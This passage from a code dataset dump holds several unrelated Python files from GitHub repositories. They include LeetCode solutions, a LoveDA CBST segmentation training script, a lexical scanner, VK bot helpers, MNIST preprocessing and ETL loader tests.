tag_repository.select(result['tag_id'])\n merchant = merchant_repository.select(result['merchant_id'])\n transaction = Transaction(result['amount'], tag, merchant, result['date'], result['id'])\n return transaction\n\ndef select_all():\n transactions = []\n sql = \"SELECT * FROM transactions\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.insert(0, transaction)\n return transactions\n\ndef total_spending():\n total_spend = 0\n transactions = select_all()\n for transaction in transactions:\n total_spend += transaction.amount\n return total_spend\n\n\ndef select_all_by_date():\n transactions = []\n sql = \"SELECT * FROM transactions ORDER BY date DESC\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.append(transaction)\n return transactions\n\ndef select_all_by_amount():\n transactions = []\n sql = \"SELECT * FROM transactions ORDER BY amount DESC\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.append(transaction)\n return transactions\n\n\n\n \n\n\n\n\n\n\n \n","repo_name":"madgelackie/spending_tracker_project","sub_path":"repositories/transaction_repository.py","file_name":"transaction_repository.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699741018","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n \n # []\n # [] [1]\n # [] [1] [2] [1,2]\n # [] [1] [2] [1,2], [3] [1,3] [2,3] [1,2,3]\n \n res = []\n res += [],\n for num in nums:\n n = len(res)\n for i in range(n):\n res += (res[i][:] + [num]),\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22949485429","text":"import argparse\nimport os.path as osp\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport math\nfrom eval import evaluate\nfrom utils.tools import *\nfrom module.Encoder import Deeplabv2\nfrom data.loveda import LoveDALoader\nfrom utils.tools import COLOR_MAP\nfrom ever.core.iterator import Iterator\nfrom tqdm import tqdm\nfrom torch.nn.utils import clip_grad\nimport ever as er\nfrom skimage.io import imsave, imread\npalette = np.asarray(list(COLOR_MAP.values())).reshape((-1,)).tolist()\n\n\n\nparser = argparse.ArgumentParser(description='Run CBST methods.')\n\nparser.add_argument('--config_path', type=str,\n help='config path')\nargs = parser.parse_args()\ncfg = import_config(args.config_path)\n\ndef main():\n os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True)\n logger = get_console_file_logger(name='CBST', logdir=cfg.SNAPSHOT_DIR)\n cudnn.enabled = True\n\n save_pseudo_label_path = osp.join(cfg.SNAPSHOT_DIR, 'pseudo_label') # in 'save_path'. Save labelIDs, not trainIDs.\n save_stats_path = osp.join(cfg.SNAPSHOT_DIR, 'stats') # in 'save_path'\n \n if not os.path.exists(cfg.SNAPSHOT_DIR):\n os.makedirs(cfg.SNAPSHOT_DIR)\n if not os.path.exists(save_pseudo_label_path):\n os.makedirs(save_pseudo_label_path)\n if not os.path.exists(save_stats_path):\n os.makedirs(save_stats_path)\n \n\n model = Deeplabv2(dict(\n backbone=dict(\n resnet_type='resnet50',\n output_stride=16,\n pretrained=True,\n ),\n multi_layer=False,\n cascade=False,\n use_ppm=True,\n ppm=dict(\n num_classes=7,\n use_aux=False,\n ),\n inchannels=2048,\n num_classes=7\n )).cuda()\n \n \n trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG)\n trainloader_iter = Iterator(trainloader)\n evalloader = LoveDALoader(cfg.EVAL_DATA_CONFIG)\n # targetloader_iter = Iterator(targetloader)\n epochs = cfg.NUM_STEPS_STOP / len(trainloader)\n logger.info('epochs ~= %.3f' % epochs)\n\n optimizer = optim.SGD(model.parameters(),\n lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)\n optimizer.zero_grad()\n # mix_trainloader = None\n targetloader = None\n\n for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)):\n if i_iter < cfg.WARMUP_STEP:\n # Train with Source\n optimizer.zero_grad()\n lr = adjust_learning_rate(optimizer, i_iter, cfg)\n batch = trainloader_iter.next()\n images_s, labels_s = batch[0]\n pred_source = model(images_s.cuda())\n pred_source = pred_source[0] if isinstance(pred_source, tuple) else pred_source\n #Segmentation Loss\n loss = loss_calc(pred_source, labels_s['cls'].cuda())\n # with amp.scale_loss(loss, optimizer) as scaled_loss:\n loss.backward()\n clip_grad.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_norm=35, norm_type=2)\n optimizer.step()\n\n if i_iter % 50 == 0:\n logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))\n text = 'iter = %d, loss_seg = %.3f, lr = %.3f'% (\n i_iter, loss, lr)\n logger.info(text)\n if i_iter >= cfg.NUM_STEPS_STOP - 1:\n print('save model ...')\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n break\n if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n model.train()\n else:\n if i_iter % cfg.GENERATE_PSEDO_EVERY == 0 or targetloader is None:\n logger.info('###### Start generate pesudo dataset in round {}! ######'.format(i_iter))\n save_round_eval_path = osp.join(cfg.SNAPSHOT_DIR, str(i_iter))\n save_pseudo_label_color_path = osp.join(save_round_eval_path, 'pseudo_label_color') # in every 'save_round_eval_path'\n if not os.path.exists(save_round_eval_path):\n os.makedirs(save_round_eval_path)\n if not os.path.exists(save_pseudo_label_color_path):\n os.makedirs(save_pseudo_label_color_path)\n # evaluation & save confidence vectors\n conf_dict, pred_cls_num, save_prob_path, save_pred_path, image_name_tgt_list = val(model, evalloader, save_round_eval_path, cfg)\n # class-balanced thresholds\n tgt_portion = min(cfg.TGT_PORTION + cfg.TGT_PORTION_STEP, cfg.MAX_TGT_PORTION)\n cls_thresh = kc_parameters(conf_dict, pred_cls_num, tgt_portion, i_iter, save_stats_path, cfg, logger)\n print('CLS THRESH', cls_thresh)\n # pseudo-label maps generation\n label_selection(cls_thresh, image_name_tgt_list, i_iter, save_prob_path, save_pred_path, save_pseudo_label_path, save_pseudo_label_color_path, save_round_eval_path, logger)\n ########### model retraining\n target_config = cfg.TARGET_DATA_CONFIG\n target_config['mask_dir'] = [save_pseudo_label_path]\n logger.info(target_config)\n targetloader = LoveDALoader(target_config)\n targetloader_iter = Iterator(targetloader)\n logger.info('###### Start model retraining dataset in round {}! ######'.format(i_iter))\n\n model.train()\n lr = adjust_learning_rate(optimizer, i_iter, cfg)\n batch = trainloader_iter.next()\n\n images_s, labels_s = batch[0]\n pred_source = model(images_s.cuda())\n pred_source = pred_source[0] if isinstance(pred_source, tuple) else pred_source\n\n batch = targetloader_iter.next()\n images_t, labels_t = batch[0]\n pred_target = model(images_t.cuda())\n pred_target = pred_target[0] if isinstance(pred_target, tuple) else pred_target\n\n loss = loss_calc(pred_source, labels_s['cls'].cuda()) * cfg.SOURCE_LOSS_WEIGHT + loss_calc(pred_target, labels_t['cls'].cuda()) * cfg.PSEUDO_LOSS_WEIGHT\n optimizer.zero_grad()\n loss.backward()\n clip_grad.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_norm=35, norm_type=2)\n optimizer.step()\n if i_iter % 50 == 0:\n logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))\n text = 'Mix iter = %d, loss_seg = %.3f, lr = %.3f'% (\n i_iter, loss, lr)\n logger.info(text)\n\n if i_iter >= cfg.NUM_STEPS_STOP - 1:\n print('save model ...')\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n break\n if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n model.train()\n\n\ndef val(model, targetloader, save_round_eval_path, cfg):\n \"\"\"Create the model and start the evaluation process.\"\"\"\n\n model.eval()\n ## output folder\n save_pred_vis_path = osp.join(save_round_eval_path, 'pred_vis')\n save_prob_path = osp.join(save_round_eval_path, 'prob')\n save_pred_path = osp.join(save_round_eval_path, 'pred')\n\n #viz_op = er.viz.VisualizeSegmm(save_pred_vis_path, palette)\n # metric_op = er.metric.PixelMetric(len(COLOR_MAP.keys()), logdir=cfg.SNAPSHOT_DIR, logger=logger)\n\n\n if not os.path.exists(save_prob_path):\n os.makedirs(save_prob_path)\n if not os.path.exists(save_pred_path):\n os.makedirs(save_pred_path)\n\n # saving output data\n conf_dict = {k: [] for k in range(cfg.NUM_CLASSES)}\n pred_cls_num = np.zeros(cfg.NUM_CLASSES)\n ## evaluation process\n image_name_tgt_list = []\n with torch.no_grad():\n for batch in tqdm(targetloader):\n images, labels = batch\n output = model(images.cuda()).softmax(dim=1)\n output = output[0] if isinstance(output, tuple) else output\n pred_label = output.argmax(dim=1).cpu().numpy()\n output = output.cpu().numpy()\n for fname, pred_i, out_i in zip(labels['fname'], pred_label, output):\n image_name_tgt_list.append(fname.split('.')[0])\n # save prob\n #viz_op(pred_i, fname)\n np.save('%s/%s' % (save_prob_path, fname.replace('png', 'npy')), out_i)\n imsave('%s/%s' % (save_pred_path, fname), pred_i.astype(np.uint8), check_contrast=False)\n out_i = out_i.transpose(1,2,0)\n conf_i = np.amax(out_i,axis=2)\n # save class-wise confidence maps\n if cfg.KC_VALUE == 'conf':\n for idx_cls in range(cfg.NUM_CLASSES):\n idx_temp = pred_i == idx_cls\n pred_cls_num[idx_cls] = pred_cls_num[idx_cls] + np.sum(idx_temp)\n if idx_temp.any():\n conf_cls_temp = conf_i[idx_temp].astype(np.float32)\n len_cls_temp = conf_cls_temp.size\n # downsampling by ds_rate\n conf_cls = conf_cls_temp[0:len_cls_temp:cfg.DS_RATE]\n conf_dict[idx_cls].extend(conf_cls)\n\n return conf_dict, pred_cls_num, save_prob_path, save_pred_path, image_name_tgt_list # return the dictionary containing all the class-wise confidence vectors\n\n\ndef kc_parameters(conf_dict, pred_cls_num, tgt_portion, round_idx, save_stats_path, cfg, logger):\n logger.info('###### Start kc generation in round {} ! ######'.format(round_idx))\n start_kc = time.time()\n # threshold for each class\n cls_thresh = np.ones(cfg.NUM_CLASSES,dtype = np.float32)\n cls_sel_size = np.zeros(cfg.NUM_CLASSES, dtype=np.float32)\n cls_size = np.zeros(cfg.NUM_CLASSES, dtype=np.float32)\n # if cfg.KC_POLICY == 'cb' and cfg.KC_VALUE == 'conf':\n for idx_cls in np.arange(0, cfg.NUM_CLASSES):\n cls_size[idx_cls] = pred_cls_num[idx_cls]\n if conf_dict[idx_cls] != None:\n conf_dict[idx_cls].sort(reverse=True) # sort in descending order\n len_cls = len(conf_dict[idx_cls])\n cls_sel_size[idx_cls] = int(math.floor(len_cls * tgt_portion))\n len_cls_thresh = int(cls_sel_size[idx_cls])\n if len_cls_thresh != 0:\n cls_thresh[idx_cls] = conf_dict[idx_cls][len_cls_thresh-1]\n conf_dict[idx_cls] = None\n\n # threshold for mine_id with priority\n num_mine_id = len(np.nonzero(cls_size / np.sum(cls_size) < cfg.MINE_PORT)[0])\n # chose the smallest mine_id\n id_all = np.argsort(cls_size / np.sum(cls_size))\n rare_id = id_all[:cfg.RARE_CLS_NUM]\n mine_id = id_all[:num_mine_id] # sort mine_id in ascending order w.r.t predication portions\n # save mine ids\n np.save(save_stats_path + '/rare_id_round' + str(round_idx) + '.npy', rare_id)\n np.save(save_stats_path + '/mine_id_round' + str(round_idx) + '.npy', mine_id)\n logger.info('Mining ids : {}! {} rarest ids: {}!'.format(mine_id, cfg.RARE_CLS_NUM, rare_id))\n # save thresholds\n np.save(save_stats_path + '/cls_thresh_round' + str(round_idx) + '.npy', cls_thresh)\n np.save(save_stats_path + '/cls_sel_size_round' + str(round_idx) + '.npy', cls_sel_size)\n logger.info('###### Finish kc generation in round {}! Time cost: {:.2f} seconds. ######'.format(round_idx,time.time() - start_kc))\n return cls_thresh\n\ndef label_selection(cls_thresh, image_name_tgt_list, round_idx, save_prob_path, save_pred_path, save_pseudo_label_path, save_pseudo_label_color_path, save_round_eval_path, logger):\n logger.info('###### Start pseudo-label generation in round {} ! ######'.format(round_idx))\n start_pl = time.time()\n #viz_op = er.viz.VisualizeSegmm(save_pseudo_label_color_path, palette)\n for sample_name in image_name_tgt_list:\n probmap_path = osp.join(save_prob_path, '{}.npy'.format(sample_name))\n pred_prob = np.load(probmap_path)\n weighted_prob = pred_prob / cls_thresh[:,None, None]\n weighted_pred_trainIDs = np.asarray(np.argmax(weighted_prob, axis=0), dtype=np.uint8)\n weighted_conf = np.amax(weighted_prob, axis=0)\n pred_label_trainIDs = weighted_pred_trainIDs.copy()\n pred_label_labelIDs = pred_label_trainIDs + 1\n \n pred_label_labelIDs[weighted_conf < 1] = 0 # '0' in LoveDA Dataset ignore\n # pseudo-labels with labelID\n #viz_op(pred_label_trainIDs, '%s_color.png' % sample_name)\n\n # save pseudo-label map with label IDs\n imsave(os.path.join(save_pseudo_label_path, '%s.png' % sample_name), pred_label_labelIDs, check_contrast=False)\n \n # remove probability maps\n if cfg.RM_PROB:\n shutil.rmtree(save_prob_path)\n\n logger.info('###### Finish pseudo-label generation in round {}! Time cost: {:.2f} seconds. ######'.format(round_idx,time.time() - start_pl))\n\n\nif __name__ == '__main__':\n seed_torch(2333)\n main()\n","repo_name":"Junjue-Wang/LoveDA","sub_path":"Unsupervised_Domian_Adaptation/CBST_train.py","file_name":"CBST_train.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"32"} +{"seq_id":"28711715593","text":"from collections import Counter\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n N, n = len(s), len(p)\n anagrams = dict(Counter(p))\n pointer = 0\n result = []\n \n while pointer < N :\n ch = s[pointer]\n if pointer >= n and s[pointer-n] in anagrams :\n anagrams[s[pointer-n]] += 1\n if ch in anagrams :\n anagrams[ch] -= 1\n if set(anagrams.values()) == {0} : result.append(pointer-n+1)\n pointer += 1\n \n return result","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q438.py","file_name":"Q438.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39806327568","text":"import os\nimport re\nfrom model.abstract_data_types.hash_table import HashTable\nfrom model.abstract_data_types.list import List\nfrom finite_automata.finite_automata import FiniteAutomata\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nPATH_TOKENS = os.getenv(\"PATH_TOKENS\")\n\n\nclass Scanner:\n def __init__(self, problem_path: str):\n with open(PATH_TOKENS) as file:\n self.__tokens = [line.strip() for line in file.readlines()]\n self.__symbol_table_identifier = HashTable()\n self.__symbol_table_constant = HashTable()\n self.__program_internal_form = List()\n self.__finite_automata = FiniteAutomata()\n with open(problem_path) as file:\n self.__problem_text = file.readlines()\n self.__scan()\n\n def __scan(self):\n error = \"Lexically Correct\"\n for index, line in enumerate(self.__problem_text):\n if re.match(r\"^\\s*$\", line):\n continue\n aux_line = line.strip()\n\n lexemes = self.sequence_to_lexemes(aux_line)\n lexemes = self.concatenate_signed_integers(lexemes)\n for lexeme in lexemes:\n verify_by_fa = self.__finite_automata.verify_lexeme(lexeme)\n if lexeme in self.__tokens:\n self.__program_internal_form.add(lexeme, -1)\n elif verify_by_fa == \"IDENTIFIER\":\n index_id = self.__symbol_table_identifier.add(lexeme)\n self.__program_internal_form.add(lexeme, index_id)\n elif verify_by_fa == \"INTEGER\" or re.match(\"^(\\\"[^\\\"]*\\\")$\", lexeme):\n index_id = self.__symbol_table_constant.add(lexeme)\n self.__program_internal_form.add(lexeme, index_id)\n else:\n index_error = self.__problem_text[index].find(lexeme)\n error = f\"Lexical Error! Line {index + 1} Col {index_error + 1}\\n\"\n error += self.__problem_text[index][:-1] + \"\\n\"\n error += \" \" * index_error + \"^\" * len(lexeme)\n break\n else:\n continue\n break\n self.write_to_file_st_pif(error)\n\n def write_to_file_st_pif(self, error):\n with open(\"PIF.out\", \"w\") as file:\n file.write(str(self.__program_internal_form) + \"\\n\\n\" + error)\n with open(\"ST.out\", \"w\") as file:\n file.write(\"IDENTIFIERS:\\n\" + str(self.__symbol_table_identifier) + \"\\n\\nCONSTANTS:\\n\" +\n str(self.__symbol_table_constant))\n\n def concatenate_signed_integers(self, lexemes):\n i = 0\n result = []\n parentheses = [\"]\", \")\", \"}\"]\n while i < len(lexemes):\n if (lexemes[i] == \"+\" or lexemes[i] == \"-\") and (\n i == 0 or (i != 0 and lexemes[i - 1] in self.__tokens)) and i + 1 < len(lexemes) \\\n and re.match(\"^(\\d|[1-9]\\d*)$\", lexemes[i + 1]) and lexemes[i - 1] not in parentheses:\n result.append(lexemes[i] + lexemes[i + 1])\n i += 2\n else:\n result.append(lexemes[i])\n i += 1\n return result\n\n @staticmethod\n def sequence_to_lexemes(sequence: str) -> list[str]:\n list_of_lexemes = []\n delimiter = [\",\", \";\", \"(\", \")\", \"[\", \"]\", \"{\", \"}\", \" \", \"+\", \"-\", \"*\", \"/\", \"%\", \">\", \"<\", \"=\"]\n soft_delimiter = [\">\", \"<\", \"=\"]\n start = 0\n end = 0\n last_char = \"\"\n while end < len(sequence):\n if sequence[end] == \"\\\"\":\n if len(last_char) == 0:\n start = end\n result = sequence[end + 1:].find(\"\\\"\")\n if result == -1:\n list_of_lexemes.append(sequence[start:])\n return list_of_lexemes\n else:\n end += result + 2\n if end >= len(sequence):\n list_of_lexemes.append(sequence[start:end])\n return list_of_lexemes\n if sequence[end] in delimiter:\n list_of_lexemes.append(sequence[start:end])\n if sequence[end] != \" \":\n list_of_lexemes.append(sequence[end])\n start = end + 1\n else:\n list_of_lexemes.append(sequence[start:end])\n list_of_lexemes.append(sequence[end:])\n return list_of_lexemes\n else:\n list_of_lexemes.append(sequence[start:end + 1])\n return list_of_lexemes\n else:\n if sequence[end] == \" \" and len(last_char) == 0:\n end += 1\n start = end\n continue\n if sequence[end] in delimiter:\n if len(last_char) != 0:\n last_char = \"\"\n list_of_lexemes.append(sequence[start:end])\n if (sequence[end] in soft_delimiter and end + 1 < len(sequence)\n and sequence[end + 1] in soft_delimiter):\n list_of_lexemes.append(sequence[end:end + 2])\n end += 1\n elif sequence[end] != \" \":\n list_of_lexemes.append(sequence[end])\n start = end + 1\n else:\n last_char = sequence[end]\n end += 1\n\n return list_of_lexemes\n","repo_name":"Sipos-Lucas-George/Formal-Languages-and-Compiler-Techniques","sub_path":"Mini Language/scanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37001174046","text":"import vk\nimport settings\nimport methods_for_db\nimport datetime\n\n\ndef get_posts(user_id, group_id):\n if not methods_for_db.have_subs(user_id):\n return []\n\n last_post_date = methods_for_db.get_group_last_date(user_id, group_id)\n\n session = vk.Session(access_token=settings.service_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n\n wall = vk_api.wall.get(owner_id='-' + str(group_id), count=10)['items']\n\n now_d = datetime.datetime.now()\n new_time = int(now_d.timestamp())\n\n ans = [rec for rec in reversed(wall) if rec['date'] > last_post_date]\n\n methods_for_db.update_group_last_date(user_id, group_id, new_time)\n\n return ans\n\n\ndef get_group(group_link):\n short_name = group_link[15::]\n session = vk.Session(access_token=settings.access_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n cur_group = vk_api.groups.getById(group_id = short_name)[0]\n\n if str(cur_group['id']) == str(settings.bot_group_id) and group_link != settings.bot_group_link:\n return 'link_error'\n\n return cur_group\n\n\ndef get_group_name(group_id):\n session = vk.Session(access_token=settings.access_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n cur_group = vk_api.groups.getById(group_id=group_id)[0]\n return cur_group['name']\n","repo_name":"alexvi88/vk_subs_bot","sub_path":"groups_tools.py","file_name":"groups_tools.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21310056949","text":"import sys\nfrom webbrowser import browser\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import QPushButton, QApplication, QMainWindow, QToolBar, QAction\n\n\nclass SubWindow(QToolBar):\n def __init__(self,main=None):\n super(SubWindow, self).__init__()\n #self.browser = Browser()\n\n test_action = QAction(\"TEST\", self)\n\n test_action.triggered.connect(self.test)\n self.addAction(test_action)\n\n def closeEvent(self, event):\n self.deleteLater()\n event.accept()\n @staticmethod\n def test():\n browser.back()\n browser.reload()\n\n\n\n\n def set_url(self):\n self.browser.setUrl(QUrl('https://onet.pl'))\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.toolbar = QToolBar()\n\n self.openButton = QPushButton(\"Open Sub Window\", self)\n self.openButton.clicked.connect(self.openSub)\n\n self.change = QPushButton(\"Change\", self)\n self.change.clicked.connect(self.set_url)\n self.toolbar.addWidget(self.openButton)\n self.toolbar.addWidget(self.change)\n\n self.browser = Browser()\n self.setCentralWidget(self.browser)\n self.browser.setUrl(QUrl('https://wp.pl'))\n self.addToolBar(self.toolbar)\n\n\n def openSub(self):\n self.subWindow = SubWindow()\n self.subWindow.show()\n\n\n\n\n def set_url(self):\n self.browser.setUrl(QUrl('https://onet.pl'))\n\n def closeEvent(self, event):\n event.accept()\n\n\n def test_action(self):\n\n print('kjnfv')\n\n\n\nclass Browser(QWebEngineView):\n def __init__(self):\n super(QWebEngineView,self).__init__()\n self.setUrl(QUrl('https://wp.pl'))\n\n\n\n\napp = QApplication(sys.argv)\nmainWin = MainWindow()\nmainWin.show()\nbrowser = Browser()\n\n\nsys.exit(app.exec_())\n","repo_name":"piter1316/WebBrowser","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11232660673","text":"# 参考: https://leetcode.com/problems/valid-parenthesis-string/discuss/543521/Java-Count-Open-Parenthesis-O(n)-time-O(1)-space-Picture-Explain\n# 这个方法比较难理解,大意是:由于我不知道 * 可能是哪种情况,所以我干脆在遍历的过程中讨论所有可能的情形,具体操作如下:\n# (必须结合连接中的图进行理解)(虽然这个方法很难想,但 Leetcode 上 Discuss 的前三都是这种方法及其变种,所以还是得掌握)\n# 1. 用 cmax 保存直至当前字符,在所有可能分支中,待匹配的 '(' 的个数的最大值\n# 2. 用 cmin 保存直至当前字符,在所有可能分支中,待匹配的 '(' 的个数的最小值\n# 遍历字符串:\n# 1. 若当前字符为 '(' ,则 cmin 和 cmax 都自增 1\n# 2. 若当前字符为 ')' ,则 cmin 和 cmax 都自减 1。若 cmin < 0,则令 cmin = 0,即抛弃那些不成立的分支\n# 3. 若当前字符为 '*' ,对应了三种可能的情形:\n# a. '*' 取 '(': cmax 自增 1\n# b. '*' 取 ')': cmin 自减 1\n# c. '*' 取 '': 无变化\n# 由于要同时考虑以上三种情况,所以在此分支下,cmax 自�� 1,cmin 自减 1\n# 4. 在进行上述操作后,如果 cmax 小于 0,则意味着没有任何一个分支满足题目的要求,直接返回 False\n# 遍历字符串后,cmin 为 0 则表明有至少一条分支满足:无待匹配的 '(',故返回 True\n# 如果 cmin > 0,表明没有一条分支满足无待匹配的 '(',故返回 False\ndef solution(s):\n cmin, cmax = 0, 0\n for c in s:\n if c == '(':\n cmin += 1\n cmax += 1\n elif c == ')':\n cmin -= 1\n cmax -= 1\n elif c == '*':\n cmin -= 1\n cmax += 1\n if cmax < 0:\n return False\n if cmin < 0:\n cmin = 0\n return cmin == 0\n\n\n# TEST\ns = \"(((((*(()((((*((**(((()()*)()()()*((((**)())*)*)))))))(())(()))())((*()()(((()((()*(())*(()**)()(())\"\nprint(solution(s)) # correct value: False\n","repo_name":"typinghare/ucas-algorithm","sub_path":"review/code/Greedy_OJ_1.py","file_name":"Greedy_OJ_1.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"37951760685","text":"import urllib.request\nimport gzip\nimport pickle\nimport os\nimport numpy as np\nfrom PIL import Image\n\n\ndataset_dir = os.path.dirname(os.path.abspath(__file__))\nsave_file = dataset_dir + \"/mnist.pkl\"\nurl_base = 'http://yann.lecun.com/exdb/mnist/'\ndata_file = {\n 'train_img':'train-images-idx3-ubyte.gz',\n 'test_img':'t10k-images-idx3-ubyte.gz',\n}\nlable_file = {\n 'train_label':'train-labels-idx1-ubyte.gz',\n 'test_label':'t10k-labels-idx1-ubyte.gz' \n}\n\ndef _download_data(file_name):\n print(f\"File url: {url_base + file_name}\")\n file_path = dataset_dir + \"/\" + file_name \n urllib.request.urlretrieve(url_base + file_name, file_path)\n print(f\"Download file: {file_path}\")\n \ndef _convert_data(file_name, dtype='data', img_size=784):\n file_path = dataset_dir + \"/\" + file_name\n print(f\"Converting file {file_path} to Numpy array\")\n \n with gzip.open(file_path, 'rb') as f:\n if dtype == 'lable':\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n elif dtype == 'data':\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n data = data.reshape(-1, img_size)\n \n return data\n\ndef _init_data():\n data_set = {}\n \n for name, file in data_file.items():\n _download_data(file)\n data_set[name] = _convert_data(file, dtype='data')\n for name, file in lable_file.items():\n _download_data(file)\n data_set[name] = _convert_data(file, dtype='lable')\n \n with open(save_file, 'wb') as f:\n pickle.dump(data_set, f, -1)\n print(f\"Save data set: {save_file}\")\n \ndef get_data():\n if not os.path.exists(save_file):\n _init_data()\n\n with open(save_file, 'rb') as f:\n dataset = pickle.load(f)\n \n return dataset\n\ndef one_hot_label(lable_int):\n mat = np.zeros((lable_int.size, 10))\n for idx, row in enumerate(mat):\n row[lable_int[idx]] = 1\n\n return mat\n\ndef reshape_data(data):\n data = data.reshape(-1, 28, 28)\n\n return data\n\ndef img_show(img):\n pil_img = Image.fromarray(np.uint8(img))\n pil_img.show()","repo_name":"ChiouBen/LeNet-practice","sub_path":"utils/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5879388518","text":"import load\nimport pytest\nfrom etl_exceptions import CannotCreateFilePath\nimport os\nfrom unittest.mock import patch\nimport pyarrow.parquet\n\n\n\n@patch('os.makedirs')\ndef test_create_full_path_ok(mock_makedirs):\n loader = load.APILoader(data=None,\n header=None,\n path='./output/wind',\n partition='partition1/partition2')\n result = loader.create_full_path('file.txt')\n expected = './output/wind/partition1/partition2/file.txt'\n assert result == expected\n mock_makedirs.assert_called()\n\n\ndef test_create_full_path_no_path_throws_exception():\n loader = load.APILoader(data=None,\n header=None,\n path=None,\n partition='partition1/partition2')\n with pytest.raises(CannotCreateFilePath):\n loader.create_full_path('file.txt')\n\n\n@patch('os.makedirs')\n@patch('pyarrow.parquet.write_table')\ndef test_create_file_ok(mock_makedirs, mock_parquet):\n loader = load.APILoader(data=[[1,2], [3,4]],\n header=[1,2],\n path='./test/1',\n partition='partition1/partition2')\n mock_parquet.assert_called()\n mock_makedirs.assert_called()\n\n\n@patch('os.makedirs')\ndef test_create_file_wrong_header_throws_exception(mock_makedirs):\n with pytest.raises(ValueError):\n loader = load.APILoader(data=[[1,2], [3,4]],\n header=[2], # Note that the header should have 2 columns\n path='./test/1',\n partition='partition1/partition2')\n\n","repo_name":"josemrsantos/trailstone","sub_path":"etl/tests/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26412699207","text":"import os\nimport pandas as pd \nimport pickle\n#INCOMPLETE\npath = \"C:\\\\Users\\\\supraja\\\\source\\\\repos\\\\DjangoWebProject1\\\\DjangoWebProject1\\\\pyt_Files\\\\log_Files\\\\\" #path to uploaded csv file along with file name\nsubpath = 'C:\\\\Users\\\\supraja\\\\source\\\\repos\\\\DjangoWebProject1\\\\DjangoWebProject1\\\\pyt_Files\\\\pdf_Files\\\\' #path to output folder without file name\n\n\ndef loadCsv(file_path):\n global path\n global subpath\n data_files = dict()\n\n data_files['data_file'] = pd.read_csv(file_path, encoding='latin-1')\n\n with open(os.path.join(subpath,'data_files_dict.txt'), 'wb') as handle:\n pickle.dump(data_files, handle)\n\n with open(os.path.join(subpath,'data_files_dict.txt'), 'rb') as handle:\n dic = 